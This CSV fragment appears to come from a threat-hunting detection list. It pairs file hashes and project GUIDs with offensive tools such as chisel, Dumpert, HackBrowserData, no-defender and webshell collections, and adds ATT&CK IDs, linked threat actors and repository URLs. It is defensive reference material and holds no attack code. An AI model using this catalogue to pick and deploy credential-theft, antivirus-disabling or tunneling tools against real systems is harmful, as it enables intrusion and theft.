"*99bedbdf28a0b90732b830ce18672ea3b5367b57bf0366714fefaa5d5e2d46f5*",".{0,1000}99bedbdf28a0b90732b830ce18672ea3b5367b57bf0366714fefaa5d5e2d46f5.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","31686" "*99c32fc0bd5b4fecb91c3774095bf610066c43596b34a0228f7ef3cb6ff39e05*",".{0,1000}99c32fc0bd5b4fecb91c3774095bf610066c43596b34a0228f7ef3cb6ff39e05.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","31687" "*99d336f5850bb8ce58273fb3cc8f5e2724769c0ff982601c16569e74da42da52*",".{0,1000}99d336f5850bb8ce58273fb3cc8f5e2724769c0ff982601c16569e74da42da52.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31688" "*99db1f18db645ee556d2805cc85df6e31710e7a3a9a3abe4340e9acd61853e1c*",".{0,1000}99db1f18db645ee556d2805cc85df6e31710e7a3a9a3abe4340e9acd61853e1c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31690" "*99DDC600-3E6F-435E-89DF-74439FA68061*",".{0,1000}99DDC600\-3E6F\-435E\-89DF\-74439FA68061.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - 
T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#GUIDproject","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","31691" "*99df113d5d44e960f503152ba57985e95e20d3491f291046eb091bb0efbc327a*",".{0,1000}99df113d5d44e960f503152ba57985e95e20d3491f291046eb091bb0efbc327a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31692" "*99df34900abf7cfbf9dfa5d8f04b8693175e0e9a4e79a85677f393232bad0e95*",".{0,1000}99df34900abf7cfbf9dfa5d8f04b8693175e0e9a4e79a85677f393232bad0e95.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31693" "*99e25d4179b7a0419d07f671ab86f25a86582e256e0862fc431eb7f93cfb3ced*",".{0,1000}99e25d4179b7a0419d07f671ab86f25a86582e256e0862fc431eb7f93cfb3ced.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential 
Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","31695" "*99E40E7F-00A4-4FB1-9441-B05A56C47C08*",".{0,1000}99E40E7F\-00A4\-4FB1\-9441\-B05A56C47C08.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","0","#GUIDproject","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","31697" "*99eb7ac696d8a296728e64853eed90941ca96c597e2c55e4fe7eac06b7aac152*",".{0,1000}99eb7ac696d8a296728e64853eed90941ca96c597e2c55e4fe7eac06b7aac152.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31699" "*99f14934d82a3db78f0f68017c079ec04dedddc5890bf5ce5194dd30801f779d*",".{0,1000}99f14934d82a3db78f0f68017c079ec04dedddc5890bf5ce5194dd30801f779d.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","31701" "*99fe09aeebf1700973742ff24b0d99708503e8f584354b3c8ec784ee92c0ec4d*",".{0,1000}99fe09aeebf1700973742ff24b0d99708503e8f584354b3c8ec784ee92c0ec4d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31703" "*9a0023406283d9856b07b2d39b4444130001f86131841df2eba206f0ae379b6c*",".{0,1000}9a0023406283d9856b07b2d39b4444130001f86131841df2eba206f0ae379b6c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31704" "*9a0281a17a7ed9d95de46360406707d3b6ad20af4e3826726cc0f6a70e4496ab*",".{0,1000}9a0281a17a7ed9d95de46360406707d3b6ad20af4e3826726cc0f6a70e4496ab.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31705" "*9a0c1767ec9ea7e8fb94abee10e7094e6952248671ef5977413dc2a8cbdd20c0*",".{0,1000}9a0c1767ec9ea7e8fb94abee10e7094e6952248671ef5977413dc2a8cbdd20c0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31706" "*9a0da3eeb072abdcdce6774d9eb431a2be86b03c3a82e34c0cf464f8150c4e2e*",".{0,1000}9a0da3eeb072abdcdce6774d9eb431a2be86b03c3a82e34c0cf464f8150c4e2e.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","31707" "*9a13e576203799161d672251815bf9f34a428af3a58787c01eb73c99c1436eac*",".{0,1000}9a13e576203799161d672251815bf9f34a428af3a58787c01eb73c99c1436eac.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","31709" "*9a193c64e8f1aceb242bf7435f04279b140e19273a2c7c0ff99561fd7abd9652*",".{0,1000}9a193c64e8f1aceb242bf7435f04279b140e19273a2c7c0ff99561fd7abd9652.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31710" "*9a1f3ecde8800a00c549fbfa3cf55acbb811fec282d2bea19b27cca9bfe8b947*",".{0,1000}9a1f3ecde8800a00c549fbfa3cf55acbb811fec282d2bea19b27cca9bfe8b947.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31711" 
"*9a1f72ea60bdc475d434f1582a564e0afaa6b68fed8318d2e955d931135818f0*",".{0,1000}9a1f72ea60bdc475d434f1582a564e0afaa6b68fed8318d2e955d931135818f0.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","31712" "*9a2e880adf7092cd9322b2dfaf502caa8e6a98afc0fecaa210a1d9f85c2bc017*",".{0,1000}9a2e880adf7092cd9322b2dfaf502caa8e6a98afc0fecaa210a1d9f85c2bc017.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31716" "*9a30590136ad955b56d367ca00f3d9feb50d4a3fb1d643fc8e3bb3cbcfd1dfa1*",".{0,1000}9a30590136ad955b56d367ca00f3d9feb50d4a3fb1d643fc8e3bb3cbcfd1dfa1.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","#filehash","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","31718" 
"*9a3206e426e910fdc8b291763e15a9e52cb66c2d9b6437bb9ec54e3da97a60d0*",".{0,1000}9a3206e426e910fdc8b291763e15a9e52cb66c2d9b6437bb9ec54e3da97a60d0.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","31719" "*9a33a8d19676646badef58d0a2db13dd763288a2a0fb8452ae2a9f826b27a234*",".{0,1000}9a33a8d19676646badef58d0a2db13dd763288a2a0fb8452ae2a9f826b27a234.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","31720" "*9A374E66-70B5-433D-8D7D-89E3F8AC0617*",".{0,1000}9A374E66\-70B5\-433D\-8D7D\-89E3F8AC0617.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such as SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31721" "*9a3a44c544cd596ebf94583614035575e746f57315e20ec56a819c7152ba3fe9*",".{0,1000}9a3a44c544cd596ebf94583614035575e746f57315e20ec56a819c7152ba3fe9.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","31722" 
"*9a48f69510e0194b5cbdcf9a15335b3db323c91898606e21ca57eae78d2bd27d*",".{0,1000}9a48f69510e0194b5cbdcf9a15335b3db323c91898606e21ca57eae78d2bd27d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31724" "*9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f*",".{0,1000}9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","31726" "*9a4d894cc0d020b03fbbf1ad8d147fc7a871a633fdc67497685a8b8d52b465e4*",".{0,1000}9a4d894cc0d020b03fbbf1ad8d147fc7a871a633fdc67497685a8b8d52b465e4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31727" "*9a53b903ad8a081200358238ad9d6a203f916f458024dd75cb04bb5063241d70*",".{0,1000}9a53b903ad8a081200358238ad9d6a203f916f458024dd75cb04bb5063241d70.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31729" "*9a5eb4fcc3cd9eabc8efc2e39bd091a2b63d7ae056dbcc7a0ee70a505b3f13b3*",".{0,1000}9a5eb4fcc3cd9eabc8efc2e39bd091a2b63d7ae056dbcc7a0ee70a505b3f13b3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31732" 
"*9a620615e1f187058c3141b16c20e9622a7aa2a095f84783f91d55b0a8ea7e28*",".{0,1000}9a620615e1f187058c3141b16c20e9622a7aa2a095f84783f91d55b0a8ea7e28.{0,1000}","offensive_tool_keyword","nps","Chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31733" "*9a64e10f2857b52c60228b64f832d371781ce6fa6a73a2245400195838d3a81f*",".{0,1000}9a64e10f2857b52c60228b64f832d371781ce6fa6a73a2245400195838d3a81f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31734" "*9a675b01d23c1afa606959ce6c9ef564a32db6672d993fa7ddb0f24dfcba850a*",".{0,1000}9a675b01d23c1afa606959ce6c9ef564a32db6672d993fa7ddb0f24dfcba850a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31735" "*9a717740140d1848e3b2641af0a517cea689409951cb1262737b06ec398180e3*",".{0,1000}9a717740140d1848e3b2641af0a517cea689409951cb1262737b06ec398180e3.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","31739" "*9a78032821b782755b4990d75b96ee3b77b58021b287d079b831f273e05636a7*",".{0,1000}9a78032821b782755b4990d75b96ee3b77b58021b287d079b831f273e05636a7.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","31740" "*9a7dc8a314e69eca7cfcd77046061485331e43c3c153ab9953e9c75f9e3db7d3*",".{0,1000}9a7dc8a314e69eca7cfcd77046061485331e43c3c153ab9953e9c75f9e3db7d3.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","0","#filehash","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","31741" "*9a83ec1bf3e113300930a7cc5d1259ef87bd85a428e3ede47104906ba3ac9fa6*",".{0,1000}9a83ec1bf3e113300930a7cc5d1259ef87bd85a428e3ede47104906ba3ac9fa6.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","31742" 
"*9a83ec1bf3e113300930a7cc5d1259ef87bd85a428e3ede47104906ba3ac9fa6*",".{0,1000}9a83ec1bf3e113300930a7cc5d1259ef87bd85a428e3ede47104906ba3ac9fa6.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","31743" "*9a85168c858654fac9052dc60b13a8c4e43c3621ea73ff3e4e9e3a6159662cfc*",".{0,1000}9a85168c858654fac9052dc60b13a8c4e43c3621ea73ff3e4e9e3a6159662cfc.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31744" "*9a85c7f95b97a65e72b0ab3c2780b0fdcf753d8997314f0aab7b11e9e31cda35*",".{0,1000}9a85c7f95b97a65e72b0ab3c2780b0fdcf753d8997314f0aab7b11e9e31cda35.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31745" 
"*9a872a2424ca1193c32e55b9bac11c09ba29d15182ad89734492c5193fd64d55*",".{0,1000}9a872a2424ca1193c32e55b9bac11c09ba29d15182ad89734492c5193fd64d55.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31746" "*9a8e6eed94ace0f4d3b91c7a8eb44625aaeb777c757cb262b22591c0f6253449*",".{0,1000}9a8e6eed94ace0f4d3b91c7a8eb44625aaeb777c757cb262b22591c0f6253449.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","31747" "*9a8e9d587b570d4074f1c8317b163aa8d0c566efd88f294d9d85bc7776352a28*",".{0,1000}9a8e9d587b570d4074f1c8317b163aa8d0c566efd88f294d9d85bc7776352a28.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","31748" "*9a8e9d587b570d4074f1c8317b163aa8d0c566efd88f294d9d85bc7776352a28*",".{0,1000}9a8e9d587b570d4074f1c8317b163aa8d0c566efd88f294d9d85bc7776352a28.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","31749" "*9a9db09b688d52c14792db24734a7aeb90499da5fbd78c9fe43c63d0d3ea3378*",".{0,1000}9a9db09b688d52c14792db24734a7aeb90499da5fbd78c9fe43c63d0d3ea3378.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31751" "*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*",".{0,1000}9AA32BBF\-90F3\-4CE6\-B210\-CBCDB85052B0.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","31753" "*9aae462701ca988bcd44fb093d7edaab28c810b398e349981361ab4a69294827*",".{0,1000}9aae462701ca988bcd44fb093d7edaab28c810b398e349981361ab4a69294827.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","31758" 
